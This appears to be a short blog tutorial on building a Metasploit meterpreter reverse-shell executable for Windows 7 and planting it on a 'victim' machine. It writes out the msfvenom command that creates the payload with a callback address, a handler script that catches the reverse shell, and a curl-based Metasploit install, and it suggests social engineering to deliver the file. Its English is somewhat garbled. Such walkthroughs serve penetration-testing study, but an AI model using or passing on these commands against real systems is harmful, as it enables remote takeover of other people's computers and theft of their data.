In this blog, we are going to take a file that can be .txt .doc .exe and we inject a payload to it, later we will verify which antivirus it detects, and finally, we will be able this file in the victim, and we will observe what happens.
what is a payload?
We can say that a payload is something harmful that is activated when executing any malware, in addition to raising privileges, it takes full advantage of the vulnerabilities found, in essence, the Payload is the part of the malicious code within the exploit, in charge of exploiting and exploiting this vulnerability to the maximum.
Installing tools in ubuntu and Debian
It does not emphasize the installation of Metasploit, but we will do a little review, so you know what it is about.
We open a Linux terminal and copies and paste the following command:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
The result of the command will be the following:
In case you have some error with the installation in this link https://www.metasploit.com/ you find the necessary documentation to perform the installation
To create a payload we have a lot of tools, a significant one is Metasploit; we will generate a payload to attack Windows 7.
msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = 192.168.100.3 -b “\ x00” -f exe -o Meterpreter.exe
This is the file that we have created and that we will put on the victim machine.
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
msfconsole -r meterpreter.rc
To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.
The following image shows the file on the Windows 7 machine.
This would be the result of the attack
Checking the victim’s network settings
This is another command with which we can do tests, this serves to show a list of files and directories.
A session of meterpreter as a shell of windows you have a large amount of commands that are very useful at the time of making an attack.